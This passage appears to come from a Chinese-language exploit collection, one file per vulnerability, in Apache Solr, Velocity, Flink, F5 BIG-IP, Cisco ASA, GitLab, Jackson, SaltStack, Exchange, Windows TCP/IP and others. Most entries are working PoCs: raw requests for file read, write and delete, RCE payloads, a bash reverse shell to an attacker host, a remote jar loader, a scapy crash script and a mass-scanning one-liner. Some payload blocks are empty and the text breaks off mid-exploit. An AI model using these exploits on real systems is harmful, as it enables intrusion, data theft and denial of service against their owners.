4 | Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。
5 |
6 | 影响版本:
7 |
8 | Apache Solr 7.0.0 - 7.7.3 Apache Solr 8.0.0 - 8.8.1
9 |
10 | poc:
11 |
12 | ```
13 | GET /solr/test/replication?command=fetchindex&masterUrl=http://127.0.0.1/&wt=json&httpBasicAuthUser=&httpBasicAuthPassword= HTTP/1.1
14 | HOST:target
15 | ....
16 | ```
17 |
18 |
19 | ```
20 | GET http://xxxxx/solr/xxxx/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1
21 | HOST:target
22 | ...
23 | ```
24 |
25 | ref:
26 |
27 | * https://nox.qianxin.com/vulnerability/detail/92900
28 | * https://nvd.nist.gov/vuln/detail/CVE-2021-27905
29 | * https://forum.ywhack.com/thread-115470-1-5.html
--------------------------------------------------------------------------------
/Apache Solr<= 8.8.2 (最新) 任意文件删除.md:
--------------------------------------------------------------------------------
1 | # Apache Solr<= 8.8.2 (最新) 任意文件删除
2 |
3 |
4 | Apache Solr全版本存在任意文件删除漏洞,在Solr默认安装后无需任何其它配置即可删除系统任意文件。
5 |
6 | 影响版本:
7 | Apache Solr < = 8.8.2
8 |
9 | poc:
10 |
11 | ```
12 | POST /solr/db/config HTTP/1.1
13 | Host: 192.168.33.130:8983
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
15 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
16 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
17 | Accept-Encoding: gzip, deflate
18 | Content-type:application/json
19 | Connection: close
20 | Upgrade-Insecure-Requests: 1
21 | Cache-Control: max-age=0
22 | Content-Length: 218
23 | {
24 | "add-requesthandler": {
25 | "name": "/testping",
26 | "class":"solr.PingRequestHandler",
27 | "defaults":{"echoParams":"explicit"},
28 | "healthcheckFile":"../../../../../../../../../../../../../aaa.txt",
29 | }
30 | }
31 |
32 | 检查创建是否成功:
33 | http://target/solr/db/config/overlay?omitHeader=true
34 |
35 | 访问:
36 | http://target/solr/db/testping?action=DISABLE
37 |
38 | 文件已成功删除。
39 | ```
40 |
41 | 详情可以参考:https://mp.weixin.qq.com/s/dECH74n5qjrWT9lok8IkPQ
42 |
43 | ref:
44 |
45 | https://nox.qianxin.com/vulnerability/detail/98218
46 |
--------------------------------------------------------------------------------
/Apache Velocity 远程代码执行 (CVE-2020-13936).md:
--------------------------------------------------------------------------------
1 | # Apache Velocity 远程代码执行 (CVE-2020-13936)
2 |
3 | Velocity Uberspector无法阻止访问java.lang.ClassLoader类加载器方法。在VelocityView的上下文中使用Velocity模板时,能够修改模版的攻击者可以使用与运行Servlet容器的帐户相同的权限执行任意Java代码或运行任意系统命令。
4 |
5 | 详细分析:https://securitylab.github.com/advisories/GHSL-2020-048-apache-velocity
6 |
7 | 测试版本:
8 |
9 | Apache Velocity 2.2
10 |
11 | **PoC:**
12 |
13 | ```
14 | ${req.getServletContext().getAttribute('org.apache.tomcat.InstanceManager').newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval("java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')")}
15 | ```
16 |
17 | from:https://securitylab.github.com/advisories/GHSL-2020-048-apache-velocity
--------------------------------------------------------------------------------
/BIG-IP 缓冲区溢出漏洞 (CVE-2021-22991).md:
--------------------------------------------------------------------------------
1 | # BIG-IP 缓冲区溢出漏洞 (CVE-2021-22991)
2 |
3 | 系统可能会错误地处理对虚拟服务器的请求,触发缓冲区溢出,从而导致DoS攻击。理论上可以绕过基于URL的访问控制或远程代码执行(RCE)。
4 |
5 | 影响版本:
6 |
7 | BIG-IP (All Modules):
8 |
9 | * 16.0.0-16.0.1
10 | * 15.1.0-15.1.2
11 | * 14.1.0-14.1.3.1
12 | * 13.1.0-13.1.3.5
13 | * 12.1.0-12.1.5.2
14 |
15 | PoC:
16 |
17 | iRule:
18 |
19 |
20 | ```
21 | when HTTP_REQUEST {
22 | log local0. \"normalized: [HTTP::uri -normalized]\"
23 | log local0. \"uri: [HTTP::uri]\" }
24 | ```
25 |
26 | 请求:
27 |
28 | ```
29 | echo -e \"GET h://[f] HTTP/1.1\\
30 | \\
31 | \" | ncat --ssl 10.154.0.3 443
32 | ```
33 |
34 | 未初始化的内存直接记录到 /var/log/ltm:
35 |
36 |
37 | ```
38 | Dec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized : normalized: h://[aa:cf01::c00:0:1100:0]/
39 | Dec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized : uri: h://[aa]
40 | ```
41 |
42 | ref:
43 |
44 | * https://support.f5.com/csp/article/K56715231
45 | * https://packetstormsecurity.com/files/161752/GS20210311143641.txt
--------------------------------------------------------------------------------
/BIG-IP- BIG-IQ iControl REST 未经身份验证的RCE (CVE-2021-22986).md:
--------------------------------------------------------------------------------
1 | # BIG-IP/ BIG-IQ iControl REST 未经身份验证的RCE (CVE-2021-22986)
2 |
3 | 此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和IP地址,对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。此漏洞只能通过control plane利用,而不能通过 data plane利用。
4 |
5 | 详情:https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
6 |
7 | **PoC:**
8 |
9 | ```json
10 | wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`id`"}' | jq .
11 | {
12 | "filePath": "`id`",
13 | "toBeInstalledAppRpmsIndex": -1,
14 | "id": "36671f83-d1be-4f5a-a2e6-7f9442a2a76f",
15 | "status": "CREATED",
16 | "userReference": {
17 | "link": "https://localhost/mgmt/shared/authz/users/admin"
18 | },
19 | "identityReferences": [
20 | {
21 | "link": "https://localhost/mgmt/shared/authz/users/admin"
22 | }
23 | ],
24 | "ownerMachineId": "ac2562f0-e41f-4652-ba35-6a2b804b235e",
25 | "generation": 1,
26 | "lastUpdateMicros": 1615930477819656,
27 | "kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",
28 | "selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f"
29 | }
30 | wvu@kharak:~$
31 | ```
32 |
33 | ID将以ROOT身份执行。
34 |
35 | ```
36 | [pid 64748] execve("/bin/tar", ["tar", "-xf", "uid=0(root)", "gid=0(root)", "groups=0(root)", "context=system_u:system_r:initrc_t:s0", "-O"], [/* 9 vars */]) = 0
37 | ```
--------------------------------------------------------------------------------
/BloofoxCMS 0.5.2.1 存储型XSS.md:
--------------------------------------------------------------------------------
1 | # BloofoxCMS 0.5.2.1 存储型XSS
2 |
3 | 漏洞文件:
4 |
5 | ```
6 | /admin/include/inc_content_articles.php
7 | ```
8 |
9 | FOFA:
10 |
11 | ```
12 | app="BloofoxCMS"
13 | ```
14 |
15 | 受影响版本:
16 |
17 | 0.5.1.0 -.5.2.1
18 |
19 | **PoC:**
20 |
21 | 登录有效的账号,在添加文章的时候插入Payload发布,每次访问均可触发:
22 |
23 | ```html
24 |
25 | ```
26 |
27 | ref:
28 |
29 | https://packetstormsecurity.com/files/161195
--------------------------------------------------------------------------------
/C-Lodop打印机任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # C-Lodop打印机任意文件读取漏洞
2 |
3 | C-Lodop打印机存在任意文件读取漏洞,通过构造特殊URL,可实现读取系统任意文件。
4 |
5 | fofa:`title="C-Lodop"`
6 |
7 | poc:
8 |
9 | ```
10 | GET /../../../../../../../../windows/System32/drivers/etc/HOSTS HTTP/1.1
11 | Host: 127.0.0.1
12 | ....
13 | ```
--------------------------------------------------------------------------------
/CISCO ASA任意文件读取漏洞 (CVE-2020-3452).md:
--------------------------------------------------------------------------------
1 | # CISCO ASA任意文件读取漏洞 (CVE-2020-3452)
2 |
3 |
4 | POC:
5 |
6 |
7 | ```
8 | /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
9 |
10 | ```
11 |
12 |
13 | ```
14 | GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
15 | Host: 127.0.0.1
16 | Connection: close
17 | Cache-Control: max-age=0
18 | Upgrade-Insecure-Requests: 1
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36
20 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
21 | Accept-Language: zh-CN,zh;q=0.9
22 | Cookie: webvpnlogin=1; webvpnLang=en
23 | ```
24 |
25 | ```
26 | GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
27 | Host: 127.0.0.1
28 | Content-Length: 2
29 |
30 | ```
31 |
32 | 从列表中单行检查CVE-2020-3452
33 |
34 |
35 | ```bash
36 | while read DOM; do curl -s -k "https://$DOM/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q Cisco && echo [VULNERABLE] $DOM || echo [NOT VULNERABLE] $DOM; done < $1
37 |
38 | ```
39 |
40 | ref:
41 |
42 | https://forum.ywhack.com/thread-1419-1-7.html
--------------------------------------------------------------------------------
/CNVD-2020-24741 JunAms内容管理系统文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | # CNVD-2020-24741 JunAms内容管理系统文件上传漏洞
2 |
3 |
4 | JunAMS是一款以ThinkPHP为框架的开源内容管理系统。
5 |
6 | JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。
7 |
8 | 影响版本:JunAMS junAMS 1.2.1.20190403
9 |
10 | EXPLOIT:
11 |
12 |
13 | ```html
14 |
18 |
19 | ```
20 |
21 | via:beautymanor
22 |
23 | ref:
24 |
25 | https://www.cnvd.org.cn/flaw/show/CNVD-2020-24741
26 |
27 |
--------------------------------------------------------------------------------
/CNVD-C-2020-121325 禅道开源版文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | # CNVD-C-2020-121325 禅道开源版文件上传漏洞
2 |
3 |
4 | 禅道官网发布了12.4.3版本更新公告,修复了一个文件上传的漏洞。恶意攻击者(需要登陆后台的任意⽤用户)可以通过fopen/fread/fwrite方法结合file、http、ftp等协议,读取或上传任意敏感文件,成功利用漏洞可获得目标系统中敏感文件及系统管理权限。
5 |
6 | 漏洞编号:
7 |
8 | CNVD-C-2020-121325
9 |
10 | 漏洞等级:高危
11 |
12 | 受影响的版本:
13 |
14 | 禅道开源版<=12.4.2
15 |
16 | 通过版本比对,问题出在module/client/ext/model/xuanxuan.php:14 的 downloadZipPackage 函数中:
17 |
18 | 
19 |
20 |
21 | 没有对后缀名进行限制,补丁则进行了白名单处理
22 |
23 | 所以getshell 的一个方法之一就是直接远程download一个php文件即可shell。
24 |
25 |
26 | 
27 |
28 |
29 | ref:
30 |
31 | https://mp.weixin.qq.com/s/d-dtcUi2yLKsyXfPuyUF8A
32 |
33 | https://www.zentao.net/dynamic/zentaopms12.4.3-80272.html
34 |
35 | https://s.tencent.com/research/bsafe/1159.html
36 |
--------------------------------------------------------------------------------
/CVE-2019-12384 jackson ssrf-rce(附exp脚本).md:
--------------------------------------------------------------------------------
1 | # CVE-2019-12384 jackson ssrf-rce(附exp脚本)
2 |
3 |
4 | 1、ssrf:
5 |
6 |
7 | ```
8 | POST /fuckme HTTP/1.1
9 | Host: 192.168.136.131:8080
10 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
11 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
12 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
13 | Accept-Encoding: gzip, deflate
14 | DNT: 1
15 | Connection: close
16 | Content-Type: application/x-www-form-urlencoded
17 | Content-Length: 109
18 |
19 | poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.136.129:7777/"}]
20 |
21 | ```
22 |
23 | 或者直接使用dnslog验证:
24 |
25 |
26 | ```
27 | poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://jcqfpe.dnslog.cn/"}]
28 |
29 | ```
30 |
31 | 2、RCE:
32 |
33 | 首先在vps上放置一个.sql的文件,内容如下:
34 |
35 |
36 | ```sql
37 | CREATE ALIAS SHELLEXEC AS $ String shellexec(String cmd) throws java.io.IOException {
38 | String[] command = {"bash", "-c", cmd};
39 | java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
40 | return s.hasNext() ? s.next() : ""; }
41 | $;
42 | CALL SHELLEXEC('bash -i >& /dev/tcp/192.168.136.129/7777 0>&1')
43 | ```
44 |
45 | 然后发送payload,请求远程的sql文件,进行RCE
46 |
47 |
48 | ```
49 | POST /fuckme HTTP/1.1
50 | Host: 192.168.136.131:8080
51 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
52 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
53 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
54 | Accept-Encoding: gzip, deflate
55 | DNT: 1
56 | Connection: close
57 | Content-Type: application/x-www-form-urlencoded
58 | Content-Length: 164
59 |
60 | poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.136.129/exp.sql'"}]
61 |
62 | ```
63 |
64 | via:Mosen
65 |
--------------------------------------------------------------------------------
/CVE-2020-10977 Gitlab任意文件读取导致远程命令执行.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-10977 Gitlab任意文件读取导致远程命令执行
2 |
3 | **任意文件读取**
4 |
5 | 新建两个测试项目
6 |
7 | 在其中一个project中创建新的issue,在其问题描述中输入下方代码,然后提交
8 |
9 |
10 | ```
11 | 
12 |
13 | ```
14 |
15 | 创建issue成功后点击move issue,将它移动到test2中
16 |
17 | test2中的issue中带了一个password附件
18 |
19 | 点击下载password附件,用记事本方式打开,发现其内容就是/etc/password的内容
20 |
21 | **RCE(remote command/code execute)**
22 |
23 | 利用任意文件读取漏洞
24 |
25 | 下载/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml文件,获取secret_key_base
26 |
27 | 
28 |
29 |
30 |
31 | ```
32 | 
33 |
34 | ```
35 |
36 | 下载secrets.yml,获取secret_key_base
37 |
38 | 在自己的攻击机上搭建一个gitlab环境(详见环境搭建笔记)
39 |
40 | 将目标机下载下来的secerts.yml覆盖在自己攻击机上/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
41 |
42 | (也可以只替换secret_key_base)
43 |
44 | 使用gitlab-rails console执行以下命令
45 |
46 |
47 | ```
48 | gitlab-rails console #进入rails console
49 | ```
50 |
51 | 依次输入:
52 |
53 |
54 | ```
55 | request = ActionDispatch::Request.new(Rails.application.env_config)
56 | request.env["action_dispatch.cookies_serializer"] = :marshal
57 | cookies = request.cookie_jar
58 | erb = ERB.new("<%= `echo flag was here > /tmp/flag` %>")
59 | depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
60 | cookies.signed[:cookie] = depr
61 | puts cookies[:cookie]
62 | ```
63 |
64 | 获取cookie,构造语句:
65 |
66 |
67 | ```
68 | curl -vvv 'http://192.168.1.86:8888/users/sign_in' -b "experimentation_subject_id=cookie"
69 |
70 | ```
71 |
72 | (ps:experimentation_subject_id参数输入rail console获取的cookie值)
73 |
74 |
75 | 通过任意文件读取下载/tmp/flag文件,内容:“flag was here”,说明命令执行成功!
76 |
77 | EXP:https://www.exploit-db.com/exploits/48431
78 |
79 | 参考:https://hackerone.com/reports/827052
80 |
81 | 来源csdn博客,原文已删。
82 |
83 | https://forum.ywhack.com/thread-114698-1-3.html
84 |
85 |
--------------------------------------------------------------------------------
/CVE-2020-13935 Apache Tomcat WebSocket 拒绝服务漏洞.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-13935 Apache Tomcat WebSocket 拒绝服务漏洞
2 |
3 |
4 | Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。
5 |
6 | 以下产品及版本受到影响:
7 |
8 | * Apache Tomcat 10.0.0-M1版本至10.0.0-M6版本
9 | * 9.0.0.M1版本至9.0.36版本
10 | * 8.5.0版本至8.5.56版本
11 | * 7.0.27版本至7.0.104版本
12 |
13 | 漏洞分析:https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/
14 |
15 | PoC:
16 |
17 | https://github.com/RedTeamPentesting/CVE-2020-13935
--------------------------------------------------------------------------------
/CVE-2020-13942 Apache Unomi 远程代码执行.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-13942 Apache Unomi 远程代码执行
2 |
3 |
4 | PoC:
5 |
6 | ```json
7 | {"filters":[{"id" : "pyn3rd","filters": [{"condition": {"parameterValues": {"pyn3rd": "script::Runtime.getRuntime().exec('open -a Calculator')"},"type":"profilePropertyCondition"}}]}],"sessionId": "pyn3rd"}
8 | ```
9 |
10 | 
11 |
12 |
13 | ref:
14 |
15 | https://twitter.com/pyn3rd/status/1328920545442680837
--------------------------------------------------------------------------------
/CVE-2020-14815 Oracle Business Intelligence XSS.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-14815 Oracle Business Intelligence XSS
2 |
3 | CVE-2020-14815 Oracle Business Intelligence XSS
4 |
5 | PoC:
6 |
7 | ```
8 | https://target[.]com/bi-security-login/login.jsp?msi=false&redirect=">
9 | ```
10 |
11 | 
12 |
13 |
14 | ref:
15 |
16 | https://www.oracle.com/security-alerts/cpuoct2020.html
17 |
18 | https://twitter.com/HackerOn2Wheels/status/1326927875279380480
--------------------------------------------------------------------------------
/CVE-2020-16846 SaltStack远程执行代码漏洞.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-16846 SaltStack远程执行代码漏洞
2 |
3 |
4 | ```
5 | PoC:
6 |
7 | POST /run HTTP/1.1
8 | Host: 127.0.0.1:8000
9 | User-Agent: Mozilla/5.0
10 | Accept: application/x-yaml
11 | Connection: close
12 | Content-Type: application/x-www-form-urlencoded
13 | Content-Length: 87
14 |
15 | token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator
16 | ```
17 |
18 | 
19 |
20 |
21 | ref:
22 |
23 | https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/
24 |
25 | https://forum.ywhack.com/thread-114703-1-4.html
--------------------------------------------------------------------------------
/CVE-2020-16898 | Windows TCP-IP远程执行代码漏洞 Exploit.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-16898 | Windows TCP/IP远程执行代码漏洞 Exploit
2 |
3 | CVE-2020-16898 | Windows TCP/IP远程执行代码漏洞 Exploit
4 |
5 | 受影响的版本
6 |
7 | Windows 10、Windows Server的多个版本均受影响。
8 |
9 | 利用视频:https://vimeo.com/467834951
10 |
11 | exploit:
12 |
13 |
14 | ```python
15 | #!/usr/bin/env python3
16 | #
17 | # Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
18 | #
19 | # Author: Adam 'pi3' Zabrocki
20 | # http://pi3.com.pl
21 | #
22 |
23 | from scapy.all import *
24 |
25 | v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
26 | v6_src = "fe80::24f5:a2ff:fe30:8890"
27 |
28 | p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
29 | p_test = p_test_half + 'A'.encode()*4
30 |
31 | c = ICMPv6NDOptEFA();
32 |
33 | e = ICMPv6NDOptRDNSS()
34 | e.len = 21
35 | e.dns = [
36 | "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
37 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
38 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
39 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
40 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
41 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
42 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
43 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
44 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
45 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
46 |
47 | pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
48 | Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
49 |
50 | p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
51 | IPv6ExtHdrFragment()/pkt
52 |
53 | l=fragment6(p_test_frag, 200)
54 |
55 | for p in l:
56 | send(p)
57 |
58 | ```
--------------------------------------------------------------------------------
/CVE-2020-17144 Exchange2010 反序列化RCE.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-17144 Exchange2010 反序列化RCE
2 |
3 | 和CVE-2018-8302、CVE-2020-0688类似,CVE-2020-17144同属需登录后利用的反序列化漏洞,但仅影响Exchange2010服务器。
4 |
5 | 与CVE-2020-0688不同,由于漏洞本身有趣的成因和触发条件,在利用时无需明文密码,只要具备NTHash即可成功,在利用方式上会相对更加灵活。同时,存在漏洞的功能点本身具备持久化功能,利用成功后将直接进行持久化行为,在不修复漏洞的情况下将永远存在,其危害性和隐蔽性远大于CVE-2020-0688
6 |
7 |
8 | ```
9 | internal bool LoadModel(out LearningModel learningModel, out MessageTransformer messageTransformer, bool parseFai)
10 | {
11 | ...
12 | return DeserializeModelFAI(userConfiguration, out learningModel, out messageTransformer);
13 | ...
14 | }
15 | ```
16 |
17 | DeserializeModelFAI 直接将用户可空的个人配置作为参数传入造成RCE
18 |
19 | **CVE-2020-17144-EXP**
20 |
21 |
22 | ```
23 | 条件: Exchange2010; 普通用户
24 | 默认用法(写webshell): CVE-2020-17144-EXP.exe mail.example.com user pass
25 |
26 | 执行命令 & 端口复用: 修改ExploitClass.cs
27 | ```
28 |
29 | 参考 @zcgonvh
30 |
31 | ```
32 | https://mp.weixin.qq.com/s?__biz=MzI2NDk0MTM5MQ==&mid=2247483712&idx=1&sn=0b2cc3c9692f5c58a4eeb246d4b392fc&chksm=eaa5bb60ddd23276baf4cfd3fc59ca847c28f350c65ef98a17d49bc9944d653fad95dec4fd14&mpshare=1&scene=1&srcid=1209jtbQLVJIgr3VT0Ut1TM9&sharer_sharetime=1607483575995&sharer_shareid=dc9cecc79ba34e4bbb700a43a16153fd#rd
33 | ```
34 |
35 |
36 | ```
37 | ExchangeService service = new ExchangeService(ExchangeVersion.Exchange2010);
38 | service.Credentials = new WebCredentials("zcgonvh","P@ssw0rd!");
39 | service.Url = new Uri("https://target/ews/Exchange.asmx");
40 | {
41 | byte[] data = EVIL-SERIALIZED-BUFFER;
42 | UserConfiguration u = null;
43 | Folder folder = Folder.Bind(service, WellKnownFolderName.Inbox);
44 | u = new UserConfiguration(service);
45 | u.BinaryData = data;
46 | u.Save("MRM.AutoTag.Model", folder.Id);
47 | }
48 | ```
49 |
50 | ref:
51 |
52 | https://github.com/Airboi/CVE-2020-17144-EXP
53 |
54 | https://mp.weixin.qq.com/s/nVtE-OFoO076x6T0147AMw
55 |
56 | 陈师傅
--------------------------------------------------------------------------------
/CVE-2020-17518 Apache Flink 任意文件写入.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-17518 Apache Flink 任意文件写入
2 |
3 | 影响范围
4 |
5 | Apache Flink 1.5.1 ~ 1.11.2
6 |
7 | FOFA:
8 |
9 | ```
10 | app="APACHE-Flink"
11 | ```
12 |
13 |
14 | ```bash
15 | POST /jars/upload HTTP/1.1
16 | Host: localhost:8081
17 | Accept-Encoding: gzip, deflate
18 | Accept: */*
19 | Accept-Language: en
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
21 | Connection: close
22 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
23 | Content-Length: 201
24 |
25 | ------WebKitFormBoundaryoZ8meKnrrso89R6Y
26 | Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/ywhack.txt"
27 |
28 | forum.ywhack.com
29 | ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
30 | ```
31 |
32 | ref
33 |
34 | https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
35 | https://github.com/apache/flink/commit/a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4
--------------------------------------------------------------------------------
/CVE-2020-17532 Apache servicecomb-java-chassis Yaml 反序列化漏洞.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-17532 Apache servicecomb-java-chassis Yaml 反序列化漏洞
2 |
3 | 在servicecomb-java-chassis中启用处理程序-路由器组件时,经过身份验证的用户可能会注入一些数据并导致任意代码执行。
4 |
5 | **commit:**
6 |
7 | https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c
8 |
9 | 影响版本:< 2.1.5
10 |
11 | **PoC:**
12 |
13 | ```
14 | !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1/"]]]]
15 | ```
16 |
17 | ```
18 | !!javax.script.ScriptEngineManager [
19 | !!java.net.URLClassLoader [[
20 | !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
21 | ]]
22 | ]
23 | ```
24 |
25 | ref:
26 |
27 | * https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c
28 | * https://seclists.org/oss-sec/2021/q1/60
29 | * https://forum.ywhack.com/thread-115020-1-1.html
--------------------------------------------------------------------------------
/CVE-2020-26935 phpmyadmin后台SQL注入.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-26935 phpmyadmin后台SQL注入
2 |
3 | 在4.9.6之前的phpMyAdmin和5.0.3之前的5.x的SearchController中发现一个问题。在phpMyAdmin如何处理搜索功能中的SQL语句中发现了一个SQL注入漏洞。攻击者可以利用此漏洞将恶意SQL注入查询。
4 |
5 | Payload:
6 |
7 |
8 | ```sql
9 | http://127.0.0.1/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
10 | ```
11 |
12 | 
13 |
14 |
15 | Reference
16 |
17 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26935
18 |
19 | via:copy@xianzhi
20 |
21 | from:https://xz.aliyun.com/t/8524
--------------------------------------------------------------------------------
/CVE-2020-27131 Cisco Security Manager 反序列化RCE.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-27131 Cisco Security Manager 反序列化RCE
2 |
3 | 思科安全管理器是一个企业级安全管理应用程序,可提供对思科安全和网络设备的了解和控制。Cisco Security Manager在广泛的Cisco安全设备中提供全面的安全管理(配置和事件管理),包括Cisco ASA自适应安全设备,Cisco IPS系列传感器设备,Cisco集成服务路由器(ISR),Cisco防火墙服务模块(FWSM) ,Cisco Catalyst,Cisco交换机等等。Cisco Security Manager允许您有效地管理各种规模的网络-从小型网络到包含数百台设备的大型网络。
4 |
5 | 多个预身份验证漏洞已于2020-07-13提交给思科,并且(根据思科)已于2020-11-10在4.22版中进行了修补。发行说明未提及有关漏洞的任何信息,也未发布安全公告。所有有效负载均在NT AUTHORITY \ SYSTEM上下文中进行处理。
6 |
7 | PoC:
8 |
9 |
10 | ```
11 | import java.security.InvalidKeyException;
12 | import java.util.Base64;
13 | import com.cisco.nm.cmf.security.jaas.BlobCrypt;
14 |
15 | public class JaasEncryptor {
16 |
17 | public static void main(String args[]) {
18 | String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";
19 |
